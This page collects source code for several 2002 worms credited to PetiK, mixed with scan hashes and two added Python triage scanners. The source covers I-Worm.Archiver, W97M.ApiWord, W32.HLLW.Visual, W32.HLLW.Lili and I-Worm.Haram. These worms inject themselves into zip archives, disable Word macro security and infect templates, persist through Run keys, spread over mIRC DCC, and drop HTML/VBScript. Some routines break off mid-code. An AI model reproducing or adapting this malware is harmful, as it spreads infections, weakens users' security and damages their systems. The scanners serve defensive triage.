env.Attachments.Add("C:\PetiK\W32.HLLW.RLF\HelloWorld.doc")
env.DeleteAfterSubmit=True
If env.To <> "" Then
env.Send
End If
Next
End If
Next
WScript.Quit
File AutoSpread.doc received on 05.16.2009 10:45:28 (CET)
Additional information
File size: 40960 bytes
MD5...: b7f7ed86d457fec2493db21e8886b981
SHA1..: 5f1c2e11b84ac3df1e06f9dc290c3706735b8065
/*
Name : I-Worm.Archiver
Author : PetiK
Date : May 10th 2002 -
Language : C++
*/
#include <windows.h>
#include <stdio.h>
#include <mapi.h>
#pragma argused
#pragma inline
char filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50];
char *fnam[]={"news","support","info","newsletter","webmaster"};
char *fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@viruslist.com"};
LPSTR run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
char attname[]="news_xxxxxxxx.exe";
LPTSTR cmdLine,ptr;
BOOL installed;
BYTE desktop[50],favoris[50],personal[50],winzip[50];
DWORD sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip);
DWORD type=REG_SZ;
long i;
LHANDLE session;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
HKEY hReg;
WIN32_FIND_DATA ffile;
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
GetModuleFileName(hInst,filen,100);
GetSystemDirectory((char *)sysdir,100);
GetWindowsDirectory((char *)copyn,100);
strcpy(windir,copyn);
strcat(copyn,"\\Archiver.exe");
installed=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
case 'p':
ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0);
MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance - (c)2002",
"I-Worm.Archiver",MB_OK|MB_ICONINFORMATION);
ExitProcess(0);
break;
}
}
}
if(!installed) {
CopyFile(filen,copyn,FALSE);
strcpy(copyreg,copyn);
strcat(copyreg," -i");
/* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100);
RegCloseKey(hReg); */
ExitProcess(0);
}
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip);
RegCloseKey(hReg);
if(strlen(winzip)!=0) {
infzip(windir);
infzip(sysdir);
infzip(desktop);
infzip(personal);
infzip(favoris);
infzip("C:\\");
}
/*
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
for(i=0;i<8;i++)
attname[i+5]='1'+(char)(9*rand()/RAND_MAX);
fsubj[0]=0;
wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]);
mes->ulReserved=0;
mes->lpszSubject=fsubj;
mes->lpszNoteText="This is some news send by our firm about security.\n"
"Please read by clicking on attached file.\n"
"\tBest Regards";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filen;
mes->lpFiles->lpszFileName=attname;
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
*/
ExitProcess(0);
}
void infzip(char *folder)
{
register bool abc=TRUE;
register HANDLE fh;
if(strlen(folder)!=0) {
SetCurrentDirectory(folder);
fh=FindFirstFile("*.zip",&ffile);
if(fh!=INVALID_HANDLE_VALUE) {
while(abc) {
inzip[0]=0;
wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
WinExec(inzip,1);
abc=FindNextFile(fh,&ffile);
}
}
}
}
File Archiver.exe received on 05.16.2009 10:45:20 (CET)
Additional information
File size: 23040 bytes
MD5...: 6079048134255a415e569a57402d7c56
SHA1..: 35867a4491825a6c2557e6103cb6164705d6328d
SHA256: f88aec37d60795ac97b73574b674bbf40bd8466dac54a33b1e1a8c0df8035391
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
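I-Worm.Archiver's only live spreading routine is `infzip()`: it runs `winzip32 -a -r <archive> Archiver.exe` against every `.zip` it finds in the Windows, system, Desktop, Personal and Favorites folders and on `C:\`, so the trace it leaves is an extra `Archiver.exe` member inside otherwise legitimate archives. The scanner below is an added triage example, not code from this archive. It inspects zip members in memory and flags the member name the worm uses, executable extensions in general, and (a generalisation beyond what the page shows) a PE `MZ` header hiding under a non-executable name. The archive it scans is constructed inline.

```python
import io
import zipfile

# Added triage helper, not part of I-Worm.Archiver: the worm runs `winzip32 -a -r <archive>
# Archiver.exe` against every .zip it finds, so the indicator is a new member named Archiver.exe
# sitting next to the archive's legitimate content.

EXEC_EXTS = {"exe", "com", "scr", "pif", "vbs"}   # assumption: what we treat as directly executable
WORM_MEMBER_NAMES = {"archiver.exe"}               # from the page: copyn = %windir%\Archiver.exe


def scan_zip_bytes(data, worm_names=WORM_MEMBER_NAMES):
    """Return [(member_name, [reasons])] for suspicious members of a zip held in memory."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            base = info.filename.rsplit("/", 1)[-1].lower()
            ext = base.rsplit(".", 1)[-1] if "." in base else ""
            with zf.open(info) as fh:
                magic = fh.read(2)
            reasons = []
            if base in worm_names:
                reasons.append("member name used by I-Worm.Archiver")
            if ext in EXEC_EXTS:
                reasons.append("executable extension")
            if magic == b"MZ" and ext not in EXEC_EXTS:
                reasons.append("PE header under a non-executable name")  # generalisation beyond the page
            if reasons:
                hits.append((info.filename, reasons))
    return hits


def build_sample_zip():
    """Constructed archive: a document, plus the two things the scanner should flag."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.doc", b"quarterly figures, nothing to see")
        zf.writestr("Archiver.exe", b"MZ" + b"\0" * 62)   # stand-in for the worm copy, not a real PE
        zf.writestr("holiday.jpg", b"MZ" + b"\0" * 62)    # PE disguised as an image
    return buf.getvalue()


if __name__ == "__main__":
    for name, why in scan_zip_bytes(build_sample_zip()):
        print(name, "->", "; ".join(why))
```

Pointing this at real archives only needs `scan_zip_bytes(open(path, "rb").read())`; reading two bytes per member keeps it cheap on large collections.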
' Name : W97M.ApiWord
' Author : PetiK
' Language : VBA Word
' Date : 14/05/2002
VB_Name = "ApiWord"
Private Declare Function Sleep& Lib "kernel32" (ByVal dwReserved As Long)
Private Declare Function CopyFile& Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Boolean)
Private Declare Function CreateDirectory& Lib "kernel32" Alias "CreateDirectoryA" (ByVal lpszCrDir As String, ByVal secu As Long)
Private Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long)
Private Declare Function ShowCursor& Lib "user32" (ByVal fshow As Boolean)
Private Declare Function SwapMouseButton& Lib "user32" (ByVal bSwap As Long)
Private Declare Function WritePrivateProfileString& Lib "kernel32" Alias
"WritePrivateProfileStringA" _
(ByVal lpszSection As String, ByVal lpszKey As String, _
ByVal lpszString As String, ByVal lpszFile As String)
Sub AutoOpen()
slp = Sleep(1000)
winp = Environ("windir")
crd = CreateDirectory(winp + "\ApiSystem", 0)
cp = CopyFile(ActiveDocument.FullName, winp + "\ApiSystem\HelloU.doc", False)
Call endprotect
Call infdoc
Call SrchF
Call PayLoad
End Sub
Sub HelpAbout()
MsgBox "System must be shutdown.", vbCritical, "Warning"
ext = ExitWindowsEx(2, 0)
End Sub
Sub SrchF()
On Error Resume Next
winp = Environ("windir")
infile = winp + "\ApiSystem\AboutU.ini"
MS = "HKEY_LOCAL_MACHINE\Software\Microsoft\ApiWord"
If System.PrivateProfileString("", MS, "Send Info") <> "OK" Then
CV = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
nom = System.PrivateProfileString("", CV, "RegisteredOwner")
ent = System.PrivateProfileString("", CV, "RegisteredOrganization")
ver = System.PrivateProfileString("", CV, "Version")
vern = System.PrivateProfileString("", CV, "VersionNumber")
pi = System.PrivateProfileString("", CV, "ProductId")
pk = System.PrivateProfileString("", CV, "ProductKey")
pf = System.PrivateProfileString("", CV, "ProgramFilesDir")
sp = System.PrivateProfileString("", _
"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page")
End Sub
Sub infdoc()
On Error Resume Next
winp = Environ("windir")
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
DropFile = winp + "\ApiSystem\src.txt"
If Nor.Item("ApiWord").Name <> "ApiWord" Then
Doc("ApiWord").Export DropFile
Nor.Import DropFile
End If
If Doc.Item("ApiWord").Name <> "ApiWord" Then
Nor("ApiWord").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
End Sub
Sub endprotect()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0
End Sub
Sub PayLoad()
num = Int((Rnd * 10) + 1)
If num = 1 Then
sm = SwapMouseButton(&H2)
ElseIf num = 5 Then
sc = ShowCursor(False)
slp = Sleep(10000)
sc = ShowCursor(True)
End If
End Sub
File ApiWord.doc received on 05.16.2009 10:45:11 (CET)
Additional information
File size: 37888 bytes
MD5...: 0b6d3ba97c607d4c334e45fda1907912
SHA1..: 826552b0aa5837a1c4c205d8c980d103deaafc01
' Name : W32.HLLW.Visual
' Author : PetiK
' Language : Visual Basic
' Date : 19/05/2002
Attribute VB_Name = "Module1"
Sub Main()
On Error Resume Next
Set fso = CreateObject("Scripting.FilesystemObject")
Set ws = CreateObject("WScript.Shell")
orig = App.Path & "\" & App.EXEName & ".exe"
cop = fso.GetSpecialFolder(1) & "\kern32dll.exe"
FileCopy orig, cop
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\kern32dll", cop
fso.CreateFolder ("C:\Backup")
ncopy = ""
For I = 1 To 10
Randomize (Timer)
ncopy = ncopy + Chr(Int(Rnd() * 26) + 97)
Next I
FileCopy orig, "C:\Backup\" & ncopy & ".exe"
Call inf(ws.SpecialFolders("MyDocuments"))
Sub inf(folder)
Set fso = CreateObject("Scripting.FilesystemObject")
Set ws = CreateObject("WScript.Shell")
orig = App.Path & "\" & App.EXEName & ".exe"
Set dire = fso.GetFolder(folder)
Set fc = dire.Files
For Each f1 In fc
ext = fso.GetExtensionName(f1.Path)
ext = LCase(ext)
oext = LCase(f1.Name)
If (ext <> "vbs") Then
If (Right(oext, 8) <> "old_.exe") Then
'MsgBox oext, vbInformation, Right(oext, 8)
FileCopy orig, f1.Path & "old_.exe"
End If
End If
Next
End Sub
File Visual.exe received on 05.16.2009 19:47:59 (CET)
Additional information
File size: 9216 bytes
MD5...: b2ff3ada6672ac9266a6fac5842ae706
SHA1..: 93d70d8a36a4139f494fe82fb8d418104a72a899
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
' Name : W32.HLLW.Lili
' Author : PetiK
' Language : Visual Basic
' Date : 31/05/2002
Sub Main()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Call CopyWorm
Call inf(App.Path)
Call inf(ws.SpecialFolders("MyDocuments"))
Call inf(fso.GetSpecialFolder(0))
Call inf(fso.GetSpecialFolder(1))
Call inf(fso.GetSpecialFolder(2))
Sub CopyWorm()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
orig = App.Path
If Right(orig, 1) <> "\" Then orig = orig & "\"
orig = orig & App.EXEName & ".exe"
copywrm = fso.GetSpecialFolder(0)
If Right(copywrm, 1) <> "\" Then copywrm = copywrm & "\"
For I = 1 To 8
Randomize (Timer)
ncopy = ncopy + Chr(Int(Rnd() * 26) + 97)
Next I
copywrm = copywrm & ncopy & ".exe"
FileCopy orig, copywrm
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NewName", copywrm
Call WritePrivateProfileString("rename", "NUL", orig, "WININIT.INI")
FileCopy orig, "C:\XXXPic.exe"
Sub inf(dir)
On Error Resume Next
orig = ""
orig = App.Path
If Right(orig, 1) <> "\" Then orig = orig & "\"
orig = orig & App.EXEName & ".exe"
End Sub
File Liliworm.exe received on 05.16.2009 17:43:19 (CET)
Additional information
File size: 37376 bytes
MD5...: fce1de67fd47f4b6b67ab7eba0bf4246
SHA1..: bc50ef3b75ee04316ce9e24ba5707ba21ad308a1
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
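Every sample above persists the same way, with a value under `HKLM\...\CurrentVersion\Run`: I-Worm.SelfWorm writes `Shell32` pointing at `ShellW32.exe -i` in the system directory, VBS.Xchange.A writes `MsExchange` for `MSXchange.vbs` in the Windows directory, W97M.AutoSpread writes an eight-digit name for `%windir%\AutoSpread\<same digits>.vbs`, W32.HLLW.Visual writes `kern32dll`, W32.HLLW.Lili writes `NewName` for a random eight-letter `.exe`, I-Worm.Archiver has the `Archiver` value commented out, and I-Worm.Haram's assembly (further down) calls `SHSetValueA` with the value `Haram` and a copy name it assembles from `mov eax,'nuF\'` / `stosd` pairs. The two Word macro worms (AutoSpread, ApiWord) also set `Level=1` and `AccessVBOM=1` under `HKCU\Software\Microsoft\Office\<ver>\Word\Security`. The script below is an added triage example, not code from this archive: it parses a `reg export` text dump, decodes Haram's stacked dword literals to get the `FunnyGame.exe` name, and reports every value that matches one of these indicators. The rules require both the value name and the data to match and are tuned to these samples only; the `.reg` text is constructed here.

```python
import re

# Added triage helper, not code from this archive. It walks a `reg export` text dump and flags
# the autorun values and Word macro-security settings that the samples on this page write:
#   I-Worm.SelfWorm   HKLM\...\Run\Shell32      = <system>\ShellW32.exe -i
#   VBS.Xchange.A     HKLM\...\Run\MsExchange   = <windir>\MSXchange.vbs
#   W97M.AutoSpread   HKLM\...\Run\<8 digits>   = <windir>\AutoSpread\<same digits>.vbs (digits 0-7)
#   W32.HLLW.Visual   HKLM\...\Run\kern32dll    = <system>\kern32dll.exe
#   W32.HLLW.Lili     HKLM\...\Run\NewName      = <windir>\<8 lowercase letters>.exe
#   I-Worm.Archiver   HKLM\...\Run\Archiver     = <windir>\Archiver.exe -i (commented out in its source)
#   I-Worm.Haram      HKLM\...\Run\Haram        = <system>\FunnyGame.exe (SHSetValueA in its asm source)
#   W97M.AutoSpread, W97M.ApiWord: HKCU\...\Office\{9,10}.0\Word\Security  Level=1, AccessVBOM=1


def decode_masm_chars(literals):
    """Recover a string built with `mov eax,'abcd'` / `stosd` pairs, as I-Worm.Haram does for its
    copy name. MASM puts the first character of a multi-character constant in the most significant
    byte, so STOSD lays the characters down reversed; a short literal is zero-padded to 4 bytes."""
    out = bytearray()
    for lit in literals:
        out += lit[::-1].encode("latin-1").ljust(4, b"\0")
    return out.rstrip(b"\0").decode("latin-1")


HARAM_COPY = decode_masm_chars(["nuF\\", "aGyn", "e.em", "ex"])   # "\FunnyGame.exe"

# (family, value-name pattern, value-data pattern); both must match, tuned to these samples only
RUN_RULES = [
    ("I-Worm.SelfWorm", r"^Shell32$",    r"\\ShellW32\.exe( -i)?$"),
    ("VBS.Xchange.A",   r"^MsExchange$", r"\\MSXchange\.vbs$"),
    ("W32.HLLW.Visual", r"^kern32dll$",  r"\\kern32dll\.exe$"),
    ("W32.HLLW.Lili",   r"^NewName$",    r"\\[a-z]{8}\.exe$"),
    ("W97M.AutoSpread", r"^[0-7]{8}$",   r"\\AutoSpread\\[0-7]{8}\.vbs$"),
    ("I-Worm.Archiver", r"^Archiver$",   r"\\Archiver\.exe -i$"),
    ("I-Worm.Haram",    r"^Haram$",      re.escape(HARAM_COPY) + "$"),
]
RUN_KEY = re.compile(r"\\CurrentVersion\\Run$", re.I)
WORD_SECURITY = re.compile(r"\\Office\\(9|10)\.0\\Word\\Security$", re.I)
REG_VALUE = re.compile(r'^"((?:[^"\\]|\\.)+)"=(?:"((?:[^"\\]|\\.)*)"|dword:([0-9a-fA-F]{8}))\s*$')


def _unescape(s):
    return re.sub(r"\\(.)", r"\1", s)   # .reg doubles backslashes and escapes quotes


def parse_reg_export(text):
    """Yield (key, value_name, data); data is str for REG_SZ and int for REG_DWORD."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = REG_VALUE.match(line) if key else None
        if m:
            name, sz, dw = m.groups()
            yield key, _unescape(name), (_unescape(sz) if sz is not None else int(dw, 16))


def scan_reg_export(text):
    """Return [(family, value_name, data)] for every value that matches an indicator above."""
    hits = []
    for key, name, data in parse_reg_export(text):
        if RUN_KEY.search(key) and isinstance(data, str):
            for family, name_re, data_re in RUN_RULES:
                if re.search(name_re, name) and re.search(data_re, data):
                    hits.append((family, name, data))
        elif WORD_SECURITY.search(key) and name in ("Level", "AccessVBOM") and data == 1:
            hits.append(("W97M macro-security tampering", name, data))
    return hits


# Constructed export: six infected autoruns, two benign ones, and a lowered Word security level.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Shell32"="C:\\WINDOWS\\SYSTEM32\\ShellW32.exe -i"
"MsExchange"="C:\\WINDOWS\\MSXchange.vbs"
"kern32dll"="C:\\WINDOWS\\SYSTEM32\\kern32dll.exe"
"NewName"="C:\\WINDOWS\\qzmfrbtu.exe"
"30517246"="C:\\WINDOWS\\AutoSpread\\30517246.vbs"
"Haram"="C:\\WINDOWS\\SYSTEM32\\FunnyGame.exe"
"SoundMAX"="C:\\Program Files\\Analog Devices\\SoundMAX\\SMTray.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]
"Level"=dword:00000001
"AccessVBOM"=dword:00000001
'''

if __name__ == "__main__":
    for family, name, data in scan_reg_export(SAMPLE_REG):
        print(f"{family:32} {name} = {data}")
```

On a live machine the input is the output of `reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run run.reg` (and the Word Security keys under HKCU); the parser only understands REG_SZ and REG_DWORD lines, which is all these samples write.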
comment *
Name : I-Worm.Haram
Author : PetiK
Language : win32asm
Date : May 13th 2002 - June 1st 2002
- On the 10th, payload : open and close the CD door and display a messagebox in a loop
.586p
.model flat
.code
JUMPS
include win32api.inc
LF equ 10
CR equ 13
CRLF equ <13,10>
@endsz macro
local nxtchr
nxtchr: lodsb
test al,al
jnz nxtchr
endm
api macro a
extrn a:proc
call a
endm
WIN32_FIND_DATA struct
dwFileAttributes dd 0
ftCreationTime dd ?,?
ftLastAccessTime dd ?,?
ftLastWriteTime dd ?,?
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0,0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
db 2 dup (0)
WIN32_FIND_DATA ends
PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ENDS
start: pushad
@SEH_SetupFrame <jmp end_worm>
hide_the_worm:
call hide_worm
get_name:
push 50
mov esi,offset orgwrm
push esi
push 0
api GetModuleFileNameA
get_copy_name:
mov edi,offset cpywrm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,'nuF\'
stosd
mov eax,'aGyn'
stosd
mov eax,'e.em'
stosd
mov eax,'ex'
stosd
pop edi
copy_worm:
push 1
push edi
push esi
api CopyFileA
test eax,eax
je ok_copy
push 50
push edi
push 1
@pushsz "Haram"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
push 50
push offset msgwrm
push esi
api GetFileTitleA
push 10h
push offset msgwrm
@pushsz "ERROR : this file is not a valid Win32 file."
push 0
api MessageBoxA
ok_copy:
call inf_doc_personal
get_startup_path:
push 0
push 7
push offset startup
push 0
api SHGetSpecialFolderPathA
push offset startup
api SetCurrentDirectoryA
call cr_vbsname
payload:
mov eax,offset sysTime
push eax
api GetSystemTime
lea eax,sysTime
cmp word ptr [eax+6],10
jne end_payload
xor eax,eax
push eax
push eax
push eax
@pushsz "set CDAudio door open"
api mciSendStringA
push 500
api Sleep
xor eax,eax
push eax
push eax
push eax
@pushsz "set CDAudio door closed"
api mciSendStringA
push 40h
@pushsz "I-Worm.Haram"
@pushsz "Coded by PetiK - ©2002 - France"
push 0
api MessageBoxA
api GetTickCount
push 10000
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
push ecx
api Sleep
jmp payload
end_payload:
call inf_process
end_worm:
@SEH_RemoveFrame
popad
push 0
api ExitProcess
hide_worm Proc
pushad
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
Spread_Mirc Proc
push offset cpywrm
push offset mirc_exe
api lstrcpy
call @mirc
db "C:\mirc\script.ini",0
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
db "C:\progra~1\mirc\script.ini",0
db "C:\progra~1\mirc32\script.ini",0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push ebp
api WriteFile
push ebp
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
ret
Spread_Mirc EndP
inf_doc_personal Proc
pushad
get_personal_folder:
push 0
push 5
push offset personal
push 0
api SHGetSpecialFolderPathA
push offset personal
api SetCurrentDirectoryA
fff_doc:
push offset ffile
@pushsz "*.doc"
api FindFirstFileA
inc eax
je end_f_doc
dec eax
mov [hfind],eax
cr_file:
push offset ffile.cFileName
push offset new_file
api lstrcpy
mov esi,offset new_file
push esi
api lstrlen
add esi,eax
sub esi,4 ; to become \SYSTEM\Wsock32
mov [esi],"mth."
lodsd
push 0
push 1
push 2
push 0
push 1
push 40000000h
push offset new_file
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_htm - s_htm
push offset s_htm
push ebp
api WriteFile
push ebp
api CloseHandle
fnf_doc:
push offset ffile
push [hfind]
api FindNextFileA
test eax,eax
jne cr_file
push [hfind]
api FindClose
end_f_doc:
popad
ret
inf_doc_personal EndP
inf_process Proc
popad
create_folder:
push 0
@pushsz "C:\backup"
api CreateDirectoryA
@pushsz "C:\backup"
api SetCurrentDirectoryA
enum_process:
push 0
push 2
api CreateToolhelp32Snapshot
mov lSnapshot,eax
inc eax
je end_inf_process
lea eax,uProcess
mov [eax.dwSize], SIZE PROCESSENTRY32
lea eax,uProcess
push eax
push lSnapshot
api Process32First
check_process:
test eax,eax
jz end_process
push ecx
mov eax,ProcessID
push offset uProcess
cmp eax,[uProcess.th32ProcessID]
je NextProcess
lea ebx,[uProcess.szExeFile]
push ebx
push offset new_name
api lstrcpy
mov edi,offset new_name
push edi
api lstrlen
add edi,eax
mov eax,"mth."
stosd
xor eax,eax
stosd
push offset new_name
@pushsz "System.htm"
api lstrcmp
test eax,eax
jz NextProcess
push 0
push 1
push 2
push 0
push 1
push 40000000h
push offset new_name
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_htm - s_htm
push offset s_htm
push ebp
api WriteFile
push ebp
api CloseHandle
NextProcess:
push offset uProcess
push lSnapshot
api Process32Next
jmp check_process
end_process:
push lSnapshot
api CloseHandle
end_inf_process:
pushad
ret
inf_process EndP
cr_vbsname Proc
mov edi,offset vbsname
; api GetTickCount
push 10
pop ecx
; xor edx,edx
; div ecx
; inc edx
; mov ecx,edx
name_g:
push ecx
api GetTickCount
push '9'-'0'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'0'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop name_g
mov eax,"sbv."
stosd
ret
cr_vbsname EndP
.data
ffile WIN32_FIND_DATA <?>
sysTime db 16 dup(0)
s_mirc: db "[script]",CRLF
db ";Don't edit this file.",CRLF,CRLF
db "n0=on 1:JOIN:{",CRLF
db "n1= /if ( $nick == $me ) { halt }",CRLF
db "n2= /.dcc send $nick "
mirc_exe db 50 dup (?)
db CRLF,"n3=}",0
e_mirc:
s_htm: db '<haram>',CRLF
db '<html><head><title>Windows Media Player</title></head><body>',CRLF
db '<script language=VBScript>',CRLF
db 'On Error Resume Next',CRLF
db 'MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"',CRLF
db 'Set upfkupfk=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set kupfkvqg=CreateObject("WScript.Shell")',CRLF
db 'If err.number=429 Then',CRLF
db 'kupfkvqg.Run javascript:location.reload()',CRLF
db 'Else',CRLF,CRLF
db 'glvqglvb(upfkupfk.GetSpecialFolder(0))',CRLF
db 'glvqglvb(upfkupfk.GetSpecialFolder(1))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Desktop"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Favorites"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Fonts"))',CRLF
db 'End If',CRLF,CRLF
db 'Function glvqglvb(dir)',CRLF
db 'If upfkupfk.FolderExists(dir) Then',CRLF
db ' Set bbbbbbbb=upfkupfk.GetFolder(dir)',CRLF
db ' Set bbblvqgl=bbbbbbbb.Files',CRLF
db ' For each lvqgvqgl in bbblvqgl',CRLF
